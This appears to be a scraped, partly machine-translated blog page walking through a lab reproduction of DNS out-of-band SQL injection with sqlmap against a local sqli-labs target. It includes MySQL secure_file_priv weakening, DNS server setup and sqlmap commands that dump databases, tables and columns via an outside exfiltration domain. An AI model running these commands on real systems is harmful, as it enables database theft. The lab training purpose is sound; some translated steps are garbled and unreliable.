当前位置:网站首页>Reproduce dns out-band data combined with sqlmap
Reproduce dns out-band data combined with sqlmap
2022-08-10 06:33:00 【fish pass ruler zz】
Set mysql's secure_file_priv attribute
If secure_file_priv is empty, you can read the directory of the disk
If secure_file_priv is D:\, you can read the files in the D disk
If secure_file_priv is null, load_file cannot load files
Add a sentence secure_file_priv=“”
Configure dns server
1.Add role
2.Add positiveFind
3. New host
IP addressFor the ip address of the virtual machine where sqlmap is located
Create aPan analysis
Use virtual machine ping just set on the server, and enter tcpdump -n port 53 in kali; check the information returned.
4. Create conditional repeater
SQLMap uses out-of-band dns injection
Fetch library
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
Get table
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
Get Columns
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
猜你喜欢
随机推荐
强化学习_06_pytorch-DQN实践(CartPole-v0)
761. 特殊的二进制序列
Elementary Structure
Talking about 3 Common Shadow Rendering Techniques in Games (3): Shadow Mapping
深入理解数组
pthread编程重要知识点
2022 Henan Mengxin League (fifth) game: University of Information Engineering H - Xiao Ming drinking milk tea
请问一下。Oracle CDC 连接器支持 LogMiner 和 XStream API 两种方式捕
tqdm高级使用方法(类keras进度条)
Quickly grasp game resources in one hour and remote hot update
强化学习_03_表格方法实践(CartPole-v0 And MontoCarlo)
Qt列表下方增加弹出加载数据提示效果
椭圆曲线离散对数问题以及求解
【8月9日活动预告】Prometheus峰会
关于研究鼠标绘制平滑曲线的阶段总结
Unity血条跟随对象
交换机的功能和ipv4
Simplest character device driver
I would like to ask you guys, when FLink SQL reads the source, specify the time field of the watermark. If the specified field is in the grid
3.事务篇【mysql高级】